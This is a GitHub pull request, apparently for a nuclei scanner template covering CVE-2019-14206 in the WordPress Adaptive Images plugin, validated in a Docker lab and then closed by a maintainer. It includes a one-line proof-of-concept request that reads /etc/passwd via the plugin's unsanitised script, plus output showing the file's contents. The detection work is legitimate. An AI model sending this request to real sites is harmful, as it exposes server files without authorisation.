Skip to content

Conversation

@guilhermemour2018-art
Copy link

@guilhermemour2018-art guilhermemour2018-art commented Jan 4, 2026

Summary

Adds a template for CVE-2019-14206 in the Adaptive Images plugin (<0.6.67). The adaptive-images-script.php input is unsanitized, allowing arbitrary file read (LFI) and arbitrary file deletion via the cache path.

/claim #14693

POC

GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd

Validation

  • Environment: Docker lab (WordPress 6.5, PHP 8.1, Adaptive Images 0.6.65) in labs/wp-adaptive-filedeletion
  • Command: nuclei -t bounties/CVE-2019-14206.yaml -u http://127.0.0.1:8080 -debug
  • Output (excerpt):
    • HTTP/1.1 200 OK
    • Content-Type: image/jpeg
    • root:x:0:0:root:/root:/bin/bash
    • 3 matches found.

References

@DhiyaneshGeek DhiyaneshGeek added the Status: On Hold Similar to blocked, but is assigned to someone label Jan 5, 2026
@DhiyaneshGeek
Copy link
Member

Hi @guilhermemour2018-art

Thanks for participating in the Bounty Claim Program

we are moving forward with this PR #14694 which met all the requirements

Due to the following reason we are closing this PR

@DhiyaneshGeek DhiyaneshGeek added Done Ready to merge and removed Status: On Hold Similar to blocked, but is assigned to someone labels Jan 5, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants